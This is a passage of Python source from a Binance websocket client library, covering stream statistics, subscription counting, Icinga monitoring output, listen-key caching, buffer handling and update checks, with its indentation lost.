# Do a fresh request if status is None or the last timestamp is older than 1 hour
if self.last_update_check_github_check_command['status'] is None or \
(self.last_update_check_github_check_command['timestamp'] + (60 * 60) < time.time()):
self.last_update_check_github_check_command['status'] = self.get_latest_release_info_check_command()
if self.last_update_check_github_check_command['status']:
try:
return self.last_update_check_github_check_command['status']["tag_name"]
except KeyError:
return "unknown"
else:
return "unknown"
def get_limit_of_subscriptions_per_stream(self):
"""
Get the number of allowed active subscriptions per stream (limit of binance API)
:return: int
"""
return self.max_subscriptions_per_stream
def get_number_of_all_subscriptions(self):
"""
Get the amount of all stream subscriptions
:return: int
"""
subscriptions = 0
try:
active_stream_list = copy.deepcopy(self.get_active_stream_list())
if active_stream_list:
for stream_id in active_stream_list:
subscriptions += active_stream_list[stream_id]['subscriptions']
self.all_subscriptions_number = subscriptions
except TypeError:
return self.all_subscriptions_number
except RuntimeError:
return self.all_subscriptions_number
return subscriptions
def get_number_of_free_subscription_slots(self, stream_id):
"""
Get the number of free subscription slots (max allowed subscriptions - subscriptions) of a specific stream
:return: int
"""
free_slots = self.max_subscriptions_per_stream - self.stream_list[stream_id]['subscriptions']
return free_slots
def get_listen_key_from_restclient(self, stream_id, api_key, api_secret, symbols=False):
"""
Get a new or cached (<30m) listen_key
:param stream_id: provide a stream_id
:type stream_id: uuid
:param api_key: provide a valid Binance API key
:type api_key: str
:param api_secret: provide a valid Binance API secret
:type api_secret: str
:param symbols: provide the symbols for isolated_margin user_data streams
:type symbols: str
:return: str or False
"""
if (self.stream_list[stream_id]['start_time'] + self.stream_list[stream_id]['listen_key_cache_time']) > \
time.time() or (self.stream_list[stream_id]['last_static_ping_listen_key'] +
self.stream_list[stream_id]['listen_key_cache_time']) > time.time():
# listen_key is not older than 30 min
if self.stream_list[stream_id]['listen_key'] is not False:
response = {'listenKey': self.stream_list[stream_id]['listen_key']}
return response
# no cached listen_key or listen_key is older than 30 min
# acquire a new listen_key:
response = self.restclient.get_listen_key(stream_id)
if response:
# save and return the valid listen_key
try:
self.stream_list[stream_id]['listen_key'] = str(response['listenKey'])
return response
except KeyError:
# no valid listen_key, but a response from endpoint
return response
except TypeError:
return response
else:
# no valid listen_key
return False
def get_most_receives_per_second(self):
"""
Get the highest total receives per second value
:return: int
"""
return self.most_receives_per_second
def get_number_of_streams_in_stream_list(self):
"""
Get the number of streams that are stored in the stream_list
:return: int
"""
return len(self.stream_list)
def get_number_of_subscriptions(self, stream_id):
"""
Get the number of subscriptions of a specific stream
:return: int
"""
count_subscriptions = 0
for channel in self.stream_list[stream_id]['channels']:
if "!" in channel \
or channel == "orders" \
or channel == "accounts" \
or channel == "transfers" \
or channel == "allTickers" \
or channel == "allMiniTickers" \
or channel == "blockheight":
count_subscriptions += 1
continue
else:
for market in self.stream_list[stream_id]['markets']:
if "!" in market \
or market == "orders" \
or market == "accounts" \
or market == "transfers" \
or market == "allTickers" \
or market == "allMiniTickers" \
or market == "blockheight":
count_subscriptions += 1
else:
count_subscriptions += 1
return count_subscriptions
def get_keep_max_received_last_second_entries(self):
"""
Get the number of received_last_second entries that are stored before they get deleted
:return: int
"""
return self.keep_max_received_last_second_entries
def get_monitoring_status_icinga(self, check_command_version=False, warn_on_update=True):
"""
Get status and perfdata to monitor and collect metrics with ICINGA/Nagios
status: OK, WARNING, CRITICAL
- WARNING: on restarts, available updates
- CRITICAL: crashed streams
perfdata:
- average receives per second since last status check
- average speed per second since last status check
- total received bytes since start
- total received length since start
- stream_buffer size
- stream_buffer length
- reconnects
- uptime
:param check_command_version: is the version of the calling `check_command <https://github.com/LUCIT-Development/check_lucit_collector.py>`_
:type check_command_version: str
:param warn_on_update: set to `False` to disable the update warning
:type warn_on_update: bool
:return: dict (text, time, return_code)
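Illustrative example (a minimal sketch of how a check plugin could use the result; the surrounding plugin code is
an assumption):
``status = binance_websocket_api_manager.get_monitoring_status_icinga(warn_on_update=False)``
``print(status['text'])``
``sys.exit(status['return_code'])``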
"""
result = self.get_monitoring_status_plain(check_command_version=check_command_version,
warn_on_update=warn_on_update)
if len(result['update_msg']) > 0 or len(result['status_msg']) > 0:
text_msg = " -" + str(result['status_msg']) + str(result['update_msg'])
else:
text_msg = ""
check_message = "BINANCE WEBSOCKETS (" + self.exchange + ") - " + result['status_text'] + ": O:" + \
str(result['active_streams']) + \
"/R:" + str(result['restarting_streams']) + "/C:" + str(result['crashed_streams']) + "/S:" + \
str(result['stopped_streams']) + text_msg + " | " + \
"active streams=" + str(result['active_streams']) + ";;;0 " + \
"average_receives_per_second=" + str(result['average_receives_per_second']) + \
";;;0 current_receiving_speed_per_second=" + str(result['average_speed_per_second']) + \
"KB;;;0 total_received_length=" + str(result['total_received_length']) + "c;;;0 total_" \
"received_size=" + str(result['total_received_mb']) + "MB;;;0 stream_buffer_size=" + \
str(result['stream_buffer_mb']) + "MB;;;0 stream_buffer_length=" + \
str(result['stream_buffer_items']) + ";;;0 reconnects=" + str(result['reconnects']) + "c;;;0 " \
"uptime_days=" + str(result['uptime']) + "c;;;0"
status = {'text': check_message,
'time': int(result['timestamp']),
'return_code': result['return_code']}
return status
def get_monitoring_status_plain(self, check_command_version=False, warn_on_update=True):
"""
Get plain monitoring status data:
active_streams, crashed_streams, restarting_streams, stopped_streams, return_code, status_text,
timestamp, update_msg, average_receives_per_second, average_speed_per_second, total_received_mb,
stream_buffer_items, stream_buffer_mb, reconnects, uptime
:param check_command_version: is the version of the calling `check_command <https://github.com/LUCIT-Development/check_lucit_collector.py>`_
:type check_command_version: False or str
:param warn_on_update: set to `False` to disable the update warning
:type warn_on_update: bool
:return: dict
"""
result = {}
result['active_streams'] = 0
result['crashed_streams'] = 0
result['restarting_streams'] = 0
result['highest_restart_per_stream_last_hour'] = 0
result['return_code'] = 0
result['status_text'] = "OK"
result['status_msg'] = ""
result['stopped_streams'] = 0
result['timestamp'] = time.time()
result['update_msg'] = ""
time_period = result['timestamp'] - self.last_monitoring_check
timestamp_last_hour = time.time() - (60*60)
try:
from unicorn_fy.unicorn_fy import UnicornFy
unicorn_fy = UnicornFy()
is_update_available_unicorn_fy = unicorn_fy.is_update_availabe()
except ModuleNotFoundError:
logging.critical("BinanceWebSocketApiManager.get_monitoring_status_plain() - UnicornFy not installed!")
is_update_available_unicorn_fy = False
except AttributeError:
logging.error("BinanceWebSocketApiManager.get_monitoring_status_plain() - UnicornFy outdated!")
is_update_available_unicorn_fy = True
if check_command_version:
is_update_available_check_command = self.is_update_availabe_check_command(
check_command_version=check_command_version)
else:
is_update_available_check_command = True
for stream_id in self.stream_list:
stream_restarts_last_hour = 0
for reconnect in self.stream_list[stream_id]['logged_reconnects']:
if reconnect > timestamp_last_hour:
stream_restarts_last_hour += 1
if stream_restarts_last_hour > result['highest_restart_per_stream_last_hour']:
result['highest_restart_per_stream_last_hour'] = stream_restarts_last_hour
for stream_id in self.stream_list:
if self.stream_list[stream_id]['status'] == "running":
result['active_streams'] += 1
elif self.stream_list[stream_id]['status'] == "stopped":
result['stopped_streams'] += 1
elif self.stream_list[stream_id]['status'] == "restarting":
result['restarting_streams'] += 1
elif "crashed" in self.stream_list[stream_id]['status']:
result['crashed_streams'] += 1
if self.is_update_availabe() and is_update_available_unicorn_fy and is_update_available_check_command:
result['update_msg'] = " Update available: UNICORN Binance WebSocket API, UnicornFy and " \
"check_lucit_collector.py!"
if warn_on_update is True:
result['status_text'] = "WARNING"
result['return_code'] = 1
elif self.is_update_availabe() and is_update_available_unicorn_fy:
result['update_msg'] = " Update available: UNICORN Binance WebSocket API and UnicornFy"
if warn_on_update is True:
result['status_text'] = "WARNING"
result['return_code'] = 1
elif self.is_update_availabe() and is_update_available_check_command:
result['update_msg'] = " Update available: UNICORN Binance WebSocket API and check_lucit_collector.py!"
if warn_on_update is True:
result['status_text'] = "WARNING"
result['return_code'] = 1
elif is_update_available_unicorn_fy and is_update_available_check_command:
result['update_msg'] = " Update available: UnicornFy and check_lucit_collector.py!"
if warn_on_update is True:
result['status_text'] = "WARNING"
result['return_code'] = 1
elif self.is_update_availabe():
result['update_msg'] = " Update " + str(self.get_latest_version()) + " available!"
if warn_on_update is True:
result['status_text'] = "WARNING"
result['return_code'] = 1
elif is_update_available_unicorn_fy:
result['update_msg'] = " Update UnicornFy " + str(unicorn_fy.get_latest_version()) + " available!"
if warn_on_update is True:
result['status_text'] = "WARNING"
result['return_code'] = 1
elif is_update_available_check_command:
result['update_msg'] = " Update `check_lucit_collector.py` " + \
str(self.get_latest_version_check_command()) + " available!"
if warn_on_update is True:
result['status_text'] = "WARNING"
result['return_code'] = 1
if result['highest_restart_per_stream_last_hour'] >= 10:
result['status_text'] = "CRITICAL"
result['return_code'] = 2
result['status_msg'] = " Restart rate per stream last hour: " + \
str(result['highest_restart_per_stream_last_hour'])
elif result['crashed_streams'] > 0:
result['status_text'] = "CRITICAL"
result['return_code'] = 2
elif result['highest_restart_per_stream_last_hour'] >= 3:
result['status_text'] = "WARNING"
result['return_code'] = 1
result['status_msg'] = " Restart rate per stream last hour: " + \
str(result['highest_restart_per_stream_last_hour'])
result['average_receives_per_second'] = ((self.total_receives - self.monitoring_total_receives) /
time_period).__round__(2)
result['average_speed_per_second'] = (((self.total_received_bytes - self.monitoring_total_received_bytes) /
time_period) / 1024).__round__(2)
result['total_received_mb'] = (self.get_total_received_bytes() / (1024 * 1024)).__round__(2)
result['total_received_length'] = self.total_receives
result['stream_buffer_items'] = str(self.get_stream_buffer_length())
result['stream_buffer_mb'] = (self.get_stream_buffer_byte_size() / (1024 * 1024)).__round__(4)
result['reconnects'] = self.get_reconnects()
self.monitoring_total_receives = self.get_total_receives()
self.monitoring_total_received_bytes = self.get_total_received_bytes()
self.last_monitoring_check = result['timestamp']
result['uptime'] = ((result['timestamp'] - self.start_time) / (60*60*24)).__round__(3)
return result
def get_process_usage_memory(self):
"""
Get the used memory of this process
:return: str
"""
process = psutil.Process(os.getpid())
memory = self.get_human_bytesize(process.memory_info()[0])
return memory
def get_process_usage_cpu(self):
"""
Get the used cpu power of this process
:return: int
"""
try:
cpu = psutil.cpu_percent(interval=None)
except OSError as error_msg:
logging.error(f"BinanceWebSocketApiManager.get_process_usage_cpu() - OSError - error_msg: {str(error_msg)}")
return False
return cpu
def get_process_usage_threads(self):
"""
Get the amount of threads that this process is using
:return: int
"""
threads = threading.active_count()
return threads
def get_reconnects(self):
"""
Get the number of total reconnects
:return: int
"""
return self.reconnects
def get_request_id(self):
"""
Get a unique `request_id`
:return: int
"""
with self.request_id_lock:
self.request_id += 1
return self.request_id
def get_result_by_request_id(self, request_id=False, timeout=10):
"""
Get the result related to the provided `request_id`
:param request_id: if you run `get_stream_subscriptions()
<https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager.BinanceWebSocketApiManager.get_stream_subscriptions>`_
it returns a unique `request_id` - provide it to this method to receive the result.
:type request_id: stream_id (uuid)
:param timeout: seconds to wait to receive the result - if it does not arrive in time, `False` is returned
:type timeout: int
:return: `result` or False
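Illustrative example (a minimal sketch - requests the subscriptions of a stream and waits up to 5 seconds for the
answer):
``request_id = binance_websocket_api_manager.get_stream_subscriptions(stream_id)``
``result = binance_websocket_api_manager.get_result_by_request_id(request_id, timeout=5)``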
"""
if request_id is False:
return False
wait_till_timestamp = time.time() + timeout
while wait_till_timestamp >= time.time():
for result in self.ringbuffer_result:
result_dict = json.loads(result)
if result_dict['id'] == request_id:
return result
return False
def get_results_from_endpoints(self):
"""
Get all result messages sent by the endpoints that are stored in the ringbuffer.
:return: list
"""
return self.ringbuffer_result
def get_ringbuffer_error_max_size(self):
"""
How many entries should be stored in the ringbuffer?
:return: int
"""
return self.ringbuffer_error_max_size
def get_ringbuffer_result_max_size(self):
"""
How many entries should be stored in the ringbuffer?
:return: int
"""
return self.ringbuffer_result_max_size
def get_start_time(self):
"""
Get the start_time of the BinanceWebSocketApiManager instance
:return: timestamp
"""
return self.start_time
def get_stream_buffer_byte_size(self):
"""
Get the current byte size estimation of the stream_buffer
:return: int
"""
total_received_bytes = self.get_total_received_bytes()
total_receives = self.get_total_receives()
stream_buffer_length = self.get_stream_buffer_length()
return round(total_received_bytes / total_receives * stream_buffer_length)
def get_stream_buffer_length(self):
"""
Get the current number of items in all stream_buffer
:return: int
"""
number = 0
number += len(self.stream_buffer)
for stream_buffer_name in self.stream_buffers:
number += len(self.stream_buffers[stream_buffer_name])
return number
def get_stream_id_by_label(self, stream_label=False):
"""
Get the stream_id of a specific stream by stream label
:param stream_label: stream_label of the stream you search
:type stream_label: str
:return: stream_id or False
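Illustrative example (a minimal sketch - assumes the stream was created with ``stream_label="trades"``):
``stream_id = binance_websocket_api_manager.get_stream_id_by_label("trades")``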
"""
if stream_label:
for stream_id in self.stream_list:
if self.stream_list[stream_id]['stream_label'] == stream_label:
return stream_id
return False
def get_stream_info(self, stream_id):
"""
Get all info about a specific stream
:param stream_id: id of a stream
:type stream_id: uuid
:return: set
"""
current_timestamp = time.time()
try:
temp_stream_list = copy.deepcopy(self.stream_list[stream_id])
except RuntimeError:
logging.error("BinanceWebSocketApiManager.get_stream_info(" + str(stream_id) + ") Info: RuntimeError")
return self.get_stream_info(stream_id)
except KeyError:
logging.error("BinanceWebSocketApiManager.get_stream_info(" + str(stream_id) + ") Info: KeyError")
return False
if temp_stream_list['last_heartbeat'] is not None:
temp_stream_list['seconds_to_last_heartbeat'] = \
current_timestamp - self.stream_list[stream_id]['last_heartbeat']
if temp_stream_list['has_stopped'] is not False:
temp_stream_list['seconds_since_has_stopped'] = \
int(current_timestamp) - int(self.stream_list[stream_id]['has_stopped'])
try:
self.stream_list[stream_id]['processed_receives_statistic'] = self.get_stream_statistic(stream_id)
except ZeroDivisionError:
pass
self.stream_list[stream_id]['transfer_rate_per_second']['speed'] = self.get_current_receiving_speed(stream_id)
return temp_stream_list
def get_stream_label(self, stream_id=False):
"""
Get the stream_label of a specific stream
:param stream_id: id of a stream
:type stream_id: uuid
:return: str or False
"""
if stream_id:
return self.stream_list[stream_id]['stream_label']
else:
return False
def get_stream_subscriptions(self, stream_id, request_id=False):
"""
Get a list of subscriptions of a specific stream from Binance endpoints - the result can be received via
the `stream_buffer` and is also added to the results ringbuffer - `get_results_from_endpoints()
<https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager.BinanceWebSocketApiManager.get_results_from_endpoints>`_
to get all results or use `get_result_by_request_id(request_id)
<https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager.BinanceWebSocketApiManager.get_result_by_request_id>`_
to get a specific one!
This function is supported by CEX endpoints only!
Info: https://github.com/binance-exchange/binance-official-api-docs/blob/master/web-socket-streams.md#listing-subscriptions
:param stream_id: id of a stream
:type stream_id: uuid
:param request_id: id to use for the request - use `get_request_id()` to create a unique id. If not provided or
`False`, then this method is using `get_request_id()
<https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager.BinanceWebSocketApiManager.get_request_id>`_
automatically.
:type request_id: int
:return: request_id (int)
"""
if request_id is False:
request_id = self.get_request_id()
if self.is_exchange_type('dex'):
logging.error("BinanceWebSocketApiManager.get_stream_subscriptions(" + str(stream_id) + ", " +
str(request_id) + ") DEX websockets dont support the listing of subscriptions! Request not "
"sent!")
return False
elif self.is_exchange_type('cex'):
payload = {"method": "LIST_SUBSCRIPTIONS",
"id": request_id}
self.stream_list[stream_id]['payload'].append(payload)
logging.info("BinanceWebSocketApiManager.get_stream_subscriptions(" + str(stream_id) + ", " +
str(request_id) + ") payload added!")
return request_id
else:
return False
def get_stream_list(self):
"""
Get a list of all streams
:return: set
"""
# get the stream list
temp_stream_list = {}
for stream_id in self.stream_list:
temp_stream_list[stream_id] = self.get_stream_info(stream_id)
return temp_stream_list
def get_stream_buffer_maxlen(self, stream_buffer_name=False):
"""
Get the maxlen value of the
`stream_buffer <https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/%60stream_buffer%60>`_
If maxlen is not specified or is None, `stream_buffer` may grow to an arbitrary length. Otherwise, the
`stream_buffer` is bounded to the specified maximum length. Once a bounded length `stream_buffer` is full, when
new items are added, a corresponding number of items are discarded from the opposite end.
:param stream_buffer_name: `False` to read from generic stream_buffer, the stream_id if you used True in
create_stream() or the string name of a shared stream_buffer.
:type stream_buffer_name: bool or str
:return: int or False
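Illustrative example (a minimal sketch - assumes a shared stream_buffer that was created with
``create_stream(..., stream_buffer_name="trades", stream_buffer_maxlen=1000)``):
``maxlen = binance_websocket_api_manager.get_stream_buffer_maxlen("trades")``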
"""
if stream_buffer_name is False:
try:
return self.stream_buffer.maxlen
except IndexError:
return False
else:
try:
return self.stream_buffers[stream_buffer_name].maxlen
except IndexError:
return False
except KeyError:
return False
def get_stream_receives_last_second(self, stream_id):
"""
Get the number of receives of a specific stream from the last second
:param stream_id: id of a stream
:type stream_id: uuid
:return: int
"""
last_second_timestamp = int(time.time()) - 1
try:
return self.stream_list[stream_id]['receives_statistic_last_second']['entries'][last_second_timestamp]
except KeyError:
return 0
def get_stream_statistic(self, stream_id):
"""
Get the statistic of a specific stream
:param stream_id: id of a stream
:type stream_id: uuid
:return: set
"""
stream_statistic = {'stream_receives_per_second': 0,
'stream_receives_per_minute': 0,
'stream_receives_per_hour': 0,
'stream_receives_per_day': 0,
'stream_receives_per_month': 0,
'stream_receives_per_year': 0}
if self.stream_list[stream_id]['status'] == "running":
stream_statistic['uptime'] = time.time() - self.stream_list[stream_id]['start_time']
elif self.stream_list[stream_id]['status'] == "stopped":
stream_statistic['uptime'] = self.stream_list[stream_id]['has_stopped'] - self.stream_list[stream_id]['start_time']
elif "crashed" in self.stream_list[stream_id]['status']:
stream_statistic['uptime'] = self.stream_list[stream_id]['has_stopped'] - self.stream_list[stream_id]['start_time']
elif self.stream_list[stream_id]['status'] == "restarting":
stream_statistic['uptime'] = time.time() - self.stream_list[stream_id]['start_time']
else:
stream_statistic['uptime'] = time.time() - self.stream_list[stream_id]['start_time']
try:
stream_receives_per_second = self.stream_list[stream_id]['processed_receives_total'] / stream_statistic['uptime']
except ZeroDivisionError:
stream_receives_per_second = 0
stream_statistic['stream_receives_per_second'] = stream_receives_per_second
if stream_statistic['uptime'] > 60:
stream_statistic['stream_receives_per_minute'] = stream_receives_per_second * 60
if stream_statistic['uptime'] > 60 * 60:
stream_statistic['stream_receives_per_hour'] = stream_receives_per_second * 60 * 60
if stream_statistic['uptime'] > 60 * 60 * 24:
stream_statistic['stream_receives_per_day'] = stream_receives_per_second * 60 * 60 * 24
if stream_statistic['uptime'] > 60 * 60 * 24 * 30:
stream_statistic['stream_receives_per_month'] = stream_receives_per_second * 60 * 60 * 24 * 30
if stream_statistic['uptime'] > 60 * 60 * 24 * 30 * 12:
stream_statistic['stream_receives_per_year'] = stream_receives_per_second * 60 * 60 * 24 * 30 * 12
return stream_statistic
def get_total_received_bytes(self):
"""
Get number of total received bytes
:return: int
"""
# how much bytes did we receive till now?
return self.total_received_bytes
def get_total_receives(self):
"""
Get the number of total receives
:return: int
"""
return self.total_receives
def get_user_agent(self):
"""
Get the user_agent string "lib name + lib version + python version"
:return:
"""
user_agent = f"{self.name}_{str(self.get_version())}-python_{str(platform.python_version())}"
return user_agent
def get_version(self):
"""
Get the package/module version
:return: str
"""
return self.version
def get_version_unicorn_fy(self):
"""
Get the package/module version of `UnicornFy <https://github.com/oliver-zehentleitner/unicorn-fy>`_
:return: str
"""
from unicorn_fy.unicorn_fy import UnicornFy
unicorn_fy = UnicornFy()
return unicorn_fy.get_version()
@staticmethod
def help():
"""
Help in iPython
"""
print("Ctrl+D to close")
def increase_received_bytes_per_second(self, stream_id, size):
"""
Add the amount of received bytes per second
:param stream_id: id of a stream
:type stream_id: uuid
:param size: amount of bytes to add
:type size: int
"""
current_timestamp = int(time.time())
try:
if self.stream_list[stream_id]['transfer_rate_per_second']['bytes'][current_timestamp]:
pass
except KeyError:
self.stream_list[stream_id]['transfer_rate_per_second']['bytes'][current_timestamp] = 0
try:
self.stream_list[stream_id]['transfer_rate_per_second']['bytes'][current_timestamp] += size
except KeyError:
pass
def increase_processed_receives_statistic(self, stream_id):
"""
Add the number of processed receives
:param stream_id: id of a stream
:type stream_id: uuid
"""
current_timestamp = int(time.time())
try:
self.stream_list[stream_id]['processed_receives_total'] += 1
except KeyError:
return False
try:
with self.stream_threading_lock[stream_id]['receives_statistic_last_second_lock']:
self.stream_list[stream_id]['receives_statistic_last_second']['entries'][current_timestamp] += 1
except KeyError:
with self.stream_threading_lock[stream_id]['receives_statistic_last_second_lock']:
self.stream_list[stream_id]['receives_statistic_last_second']['entries'][current_timestamp] = 1
with self.total_receives_lock:
self.total_receives += 1
def increase_reconnect_counter(self, stream_id):
"""
Increase reconnect counter
:param stream_id: id of a stream
:type stream_id: uuid
"""
self.stream_list[stream_id]['logged_reconnects'].append(time.time())
self.stream_list[stream_id]['reconnects'] += 1
with self.reconnects_lock:
self.reconnects += 1
def increase_transmitted_counter(self, stream_id):
"""
Increase the counter of transmitted payloads
:param stream_id: id of a stream
:type stream_id: uuid
"""
self.stream_list[stream_id]['processed_transmitted_total'] += 1
with self.total_transmitted_lock:
self.total_transmitted += 1
def is_manager_stopping(self):
"""
        Returns `True` if the manager has a stop request, `False` if not.
:return: bool
"""
if self.stop_manager_request is None:
return False
else:
return True
def is_exchange_type(self, exchange_type=False):
"""
Check the exchange type!
:param exchange_type: Valid types are `dex` and `cex`!
:type exchange_type: str
:return: bool
"""
if exchange_type is False:
return False
if self.exchange == "binance.org" or \
self.exchange == "binance.org-testnet":
is_type = "dex"
elif self.exchange == "binance.com" or \
self.exchange == "binance.com-testnet" or \
self.exchange == "binance.com-margin" or \
self.exchange == "binance.com-margin-testnet" or \
self.exchange == "binance.com-isolated_margin" or \
self.exchange == "binance.com-isolated_margin-testnet" or \
self.exchange == "binance.com-futures" or \
self.exchange == "binance.com-futures-testnet" or \
self.exchange == "binance.com-coin-futures" or \
self.exchange == "binance.com-coin_futures" or \
self.exchange == "binance.je" or \
self.exchange == "binance.us" or \
self.exchange == "trbinance.com" or \
self.exchange == "jex.com":
is_type = "cex"
else:
logging.critical(f"BinanceWebSocketApiManager.is_exchange_type() - Can not determine exchange type for"
f"exchange={str(self.exchange)}")
return False
if is_type == exchange_type:
return True
else:
return False
def is_stop_request(self, stream_id, exclude_kill_requests=False):
"""
        Does a specific stream have a stop_request?
:param stream_id: id of a stream
:type stream_id: uuid
:param exclude_kill_requests: if `True` this method returns `False` on kill_requests
:type exclude_kill_requests: bool
:return: bool
"""
logging.debug("BinanceWebSocketApiManager.is_stop_request(" + str(stream_id) + ")")
try:
if self.stream_list[stream_id]['stop_request'] is True:
return True
elif self.is_manager_stopping():
return True
elif self.stream_list[stream_id]['kill_request'] is True and exclude_kill_requests is False:
return True
else:
return False
except KeyError:
return False
def is_stop_as_crash_request(self, stream_id):
"""
        Does a specific stream have a stop_as_crash_request?
:param stream_id: id of a stream
:type stream_id: uuid
:return: bool
"""
logging.debug("BinanceWebSocketApiManager.is_stop_as_crash_request(" + str(stream_id) + ")")
try:
if self.stream_list[stream_id]['crash_request'] is True:
return True
except KeyError:
pass
if self.is_manager_stopping():
return True
else:
return False
def is_update_availabe(self):
"""
Is a new release of this package available?
:return: bool
"""
installed_version = self.get_version()
if ".dev" in installed_version:
installed_version = installed_version[:-4]
if self.get_latest_version() == installed_version:
return False
elif self.get_latest_version() == "unknown":
return False
else:
return True
def is_update_availabe_unicorn_fy(self):
"""
Is a new release of `UnicornFy <https://github.com/oliver-zehentleitner/unicorn-fy>`_ available?
:return: bool
"""
from unicorn_fy.unicorn_fy import UnicornFy
unicorn_fy = UnicornFy()
return unicorn_fy.is_update_availabe()
def is_update_availabe_check_command(self, check_command_version=False):
"""
Is a new release of `check_lucit_collector.py` available?
:return: bool
"""
installed_version = check_command_version
latest_version = self.get_latest_version_check_command()
if ".dev" in str(installed_version):
installed_version = installed_version[:-4]
if latest_version == installed_version:
return False
elif latest_version == "unknown":
return False
else:
return True
def kill_stream(self, stream_id):
"""
Kill a specific stream
:param stream_id: id of a stream
:type stream_id: uuid
:return: bool
"""
# stop a specific stream by stream_id
logging.info("BinanceWebSocketApiManager.kill_stream(" + str(stream_id) + ")")
self.stream_list[stream_id]['kill_request'] = True
def pop_stream_data_from_stream_buffer(self, stream_buffer_name=False, mode="FIFO"):
"""
Get oldest or latest entry from
`stream_buffer <https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/%60stream_buffer%60>`_
and remove from FIFO/LIFO stack.
:param stream_buffer_name: `False` to read from generic stream_buffer, the stream_id if you used True in
create_stream() or the string name of a shared stream_buffer.
:type stream_buffer_name: bool or str
:param mode: How to read from the `stream_buffer` - "FIFO" (default) or "LIFO".
:type mode: str
:return: stream_data - str, dict or False
"""
if stream_buffer_name is False:
try:
with self.stream_buffer_lock:
if mode.upper() == "FIFO":
stream_data = self.stream_buffer.popleft()
elif mode.upper() == "LIFO":
stream_data = self.stream_buffer.pop()
else:
return False
return stream_data
except IndexError:
return False
else:
try:
with self.stream_buffer_locks[stream_buffer_name]:
if mode.upper() == "FIFO":
stream_data = self.stream_buffers[stream_buffer_name].popleft()
elif mode.upper() == "LIFO":
stream_data = self.stream_buffers[stream_buffer_name].pop()
else:
return False
return stream_data
except IndexError:
return False
except KeyError:
return False
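    # Hedged usage sketch (assumption, not from the original source): a typical consumer
    # loop draining the generic stream_buffer. `manager` is assumed to be a running
    # BinanceWebSocketApiManager instance and `process` a placeholder for your handler.
    #
    #   import time
    #   while True:
    #       data = manager.pop_stream_data_from_stream_buffer()
    #       if data is False:
    #           time.sleep(0.01)   # buffer empty, avoid busy-waiting
    #           continue
    #       process(data)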
def pop_stream_signal_from_stream_signal_buffer(self):
"""
Get oldest entry from
`stream_signal_buffer <https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/%60stream_signal_buffer%60>`_
and remove from stack/pipe (FIFO stack)
:return: stream_signal - dict or False
"""
try:
with self.stream_signal_buffer_lock:
stream_signal = self.stream_signal_buffer.popleft()
return stream_signal
except IndexError:
return False
def print_stream_info(self, stream_id, add_string=""):
"""
Print all infos about a specific stream, helps debugging :)
:param stream_id: id of a stream
:type stream_id: uuid
:param add_string: text to add to the output
:type add_string: str
:return: bool
"""
restart_requests_row = ""
binance_api_status_row = ""
stream_label_row = ""
status_row = ""
payload_row = ""
symbol_row = ""
dex_user_address_row = ""
last_static_ping_listen_key = ""
stream_info = self.get_stream_info(stream_id)
stream_row_color_prefix = ""
stream_row_color_suffix = ""
if len(add_string) > 0:
add_string = " " + str(add_string) + "\r\n"
try:
if len(self.stream_list[stream_id]['logged_reconnects']) > 0:
logged_reconnects_row = "\r\n logged_reconnects: "
row_prefix = ""
for timestamp in self.stream_list[stream_id]['logged_reconnects']:
logged_reconnects_row += row_prefix + \
datetime.utcfromtimestamp(timestamp).strftime('%Y-%m-%d, %H:%M:%S UTC')
row_prefix = ", "
else:
logged_reconnects_row = ""
except KeyError:
return False
if "running" in stream_info['status']:
stream_row_color_prefix = "\033[1m\033[32m"
stream_row_color_suffix = "\033[0m\r\n"
for reconnect_timestamp in self.stream_list[stream_id]['logged_reconnects']:
if (time.time() - reconnect_timestamp) < 2:
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m\r\n"
status_row = stream_row_color_prefix + " status: " + str(stream_info['status']) + stream_row_color_suffix
elif "crashed" in stream_info['status']:
stream_row_color_prefix = "\033[1m\033[31m"
stream_row_color_suffix = "\033[0m\r\n"
status_row = stream_row_color_prefix + " status: " + str(stream_info['status']) + stream_row_color_suffix
elif "restarting" in stream_info['status']:
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m\r\n"
status_row = stream_row_color_prefix + " status: " + str(stream_info['status']) + stream_row_color_suffix
elif "stopped" in stream_info['status']:
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m\r\n"
status_row = stream_row_color_prefix + " status: " + str(stream_info['status']) + stream_row_color_suffix
try:
if self.restart_requests[stream_id]['status']:
restart_requests_row = " restart_request: " + self.restart_requests[stream_id]['status'] + "\r\n"
except KeyError:
pass
if self.stream_list[stream_id]['markets'] == "!userData":
last_static_ping_listen_key = " last_static_ping_listen_key: " + \
str(self.stream_list[stream_id]['last_static_ping_listen_key']) + "\r\n"
if self.binance_api_status['status_code'] == 200:
binance_api_status_code = str(self.binance_api_status['status_code'])
elif self.binance_api_status['status_code'] == 418:
binance_api_status_code = "\033[1m\033[31m" + str(self.binance_api_status['status_code']) + "\033[0m"
else:
binance_api_status_code = "\033[1m\033[33m" + str(self.binance_api_status['status_code']) + "\033[0m"
binance_api_status_row = " binance_api_status: used_weight=" + str(self.binance_api_status['weight']) + \
", status_code=" + str(binance_api_status_code) + " (last update " + \
str(datetime.utcfromtimestamp(
self.binance_api_status['timestamp']).strftime('%Y-%m-%d, %H:%M:%S UTC')) + \
")\r\n"
current_receiving_speed = str(self.get_human_bytesize(self.get_current_receiving_speed(stream_id), "/s"))
if self.stream_list[stream_id]['symbols'] is not False:
symbol_row = " symbols:" + str(stream_info['symbols']) + "\r\n"
if self.stream_list[stream_id]["payload"]:
payload_row = " payload: " + str(self.stream_list[stream_id]["payload"]) + "\r\n"
if self.stream_list[stream_id]["dex_user_address"] is not False:
dex_user_address_row = " user_address: " + str(self.stream_list[stream_id]["dex_user_address"]) + "\r\n"
